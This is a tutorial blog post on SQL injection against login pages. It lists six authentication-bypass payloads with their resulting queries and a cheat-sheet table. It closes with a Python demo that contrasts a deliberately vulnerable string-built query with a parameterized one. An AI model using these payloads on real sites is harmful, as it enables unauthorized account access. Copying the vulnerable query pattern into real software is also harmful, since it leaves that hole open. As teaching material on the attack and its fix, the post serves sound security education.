Helping Information

SQL Injection on Login Page

Discover 6 SQL injections on a login page.

In this post, we are going to learn about SQL injection and how to test a login page using SQL injection.

Let's dive into this. Suppose we are testing a login page where username and password verification is a must. Both the username and password fields are prone to code injection.

| Sr No | Username | Password | Status |
|---|---|---|---|
| 1 | admin | admin | ok |
| 2 | raj | 12345 | ok |

SQL Injection on Login Page

Type 1
Executed SQL query when username is admin and password is admin:

SELECT * FROM users WHERE name='admin' and password='admin'

When a user starts a login and enters the username and password on the login page, a SQL query is generated and executed against the database to verify the username and password entered by the user. The above query searches the table for a row where the username is admin and the password is admin. If the entries match a row in the table, the user is authenticated.

To bypass this security mechanism, SQL code has to be injected into the input fields. The SQL code has to be injected in such a way that the SQL statement returns a valid result when the injected code executes. If there is an error in the syntax, it won't fetch a valid result. So putting in random SQL commands and submitting will not always result in successful authentication on the login page.

Type 2
Executed SQL query when username is admin and password is a single quote:

SELECT * FROM users WHERE name='admin' and password='''

The above query is not going to yield any output as it is not a valid query. If the web login page is not filtering out the error message, you will be able to see an error message on the page. The trick is to keep the query valid by putting the correct SQL commands in place.

Type 3
Executed SQL query when username is admin and password is ' or '1'='1:

SELECT * FROM users WHERE name='admin' and password='' or '1'='1'

If the username is already known, the only thing to be bypassed is the password verification. So, the SQL commands should be crafted in a similar way to the one given above to bypass the login page.

The password='' or '1'='1' condition is always true, so the password verification never happens. It can also be said that the above statement is more or less equal to the following query:

SELECT * FROM users WHERE name='admin'

That is only one possibility. The actual exploit is limited only by the imagination of the tester. Let's check out another possibility.

Type 4
Executed SQL query when username is admin and password is ' or 1='1:

SELECT * FROM users WHERE name='admin' and password='' or 1='1'

The password='' or 1='1' condition is also always true, just like in the previous case, and thus bypasses the security on the login page.
The above two cases needed a valid username to be supplied. But that is not necessarily required, since the username field is also vulnerable to SQL injection attacks.

Type 5
Executed SQL query when username is ' or '1'='1 and password is ' or '1'='1:

SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1'

The SQL query is crafted in such a way that both username and password verification are bypassed. The above statement actually queries for all the users in the database and thus bypasses all the security.

Type 6
Executed SQL query when username is ' or ' 1=1 and password is ' or ' 1=1:

SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1'

The above query is also more or less similar to the previous query and is a possible way to get authenticated.

Cheat Sheet

| Sr No | Username | Password | SQL Query |
|---|---|---|---|
| 1 | admin | admin | SELECT * FROM users WHERE name='admin' and password='admin' |
| 2 | admin | ' or '1'='1 | SELECT * FROM users WHERE name='admin' and password='' or '1'='1' |
| 3 | admin | ' or 1='1 | SELECT * FROM users WHERE name='admin' and password='' or 1='1' |
| 4 | admin | 1' or 1=1 -- | SELECT * FROM users WHERE name='admin' and password='' or 1=1-- -' |
| 5 | ' or '1'='1 | ' or '1'='1 | SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1' |
| 6 | ' or ' 1=1 | ' or ' 1=1 | SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1' |
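
As an added example (not code from the original post), the following Python script uses an in-memory SQLite database to run a valid login and the Type 2, Type 3 and Type 5 inputs against a string-built query and against a parameterized one. The function names are hypothetical, and the table is constructed from the two sample rows at the top of the post.

```python
import sqlite3

# Constructed sample data mirroring the post's users table (plaintext
# passwords only to match the post; real systems store password hashes).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "admin"), ("raj", "12345")])
    return db

def login_concat(db, name, password):
    """Vulnerable: input is pasted into the SQL text, as in the post's queries."""
    sql = ("SELECT name FROM users WHERE name='%s' and password='%s'"
           % (name, password))
    try:
        return sorted(r[0] for r in db.execute(sql))
    except sqlite3.OperationalError as exc:  # unbalanced quote (Type 2)
        return "error: %s" % exc

def login_param(db, name, password):
    """Hardened: placeholders keep input as data, never as SQL syntax."""
    sql = "SELECT name FROM users WHERE name=? and password=?"
    return sorted(r[0] for r in db.execute(sql, (name, password)))

# Inputs taken from the post: valid login, Type 2, Type 3, Type 5.
CASES = [
    ("admin", "admin"),
    ("admin", "'"),
    ("admin", "' or '1'='1"),
    ("' or '1'='1", "' or '1'='1"),
]

def compare():
    """Return (name, password, concat_result, param_result) for each case."""
    db = make_db()
    return [(n, p, login_concat(db, n, p), login_param(db, n, p))
            for n, p in CASES]

if __name__ == "__main__":
    for name, pw, weak, safe in compare():
        print("%-14r %-14r concat=%r param=%r" % (name, pw, weak, safe))
```

With the string-built query, the Type 3 and Type 5 inputs return every row, because AND binds tighter than OR and the trailing '1'='1' makes the WHERE clause true for all users. The parameterized query treats the same inputs as literal strings and returns no rows.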
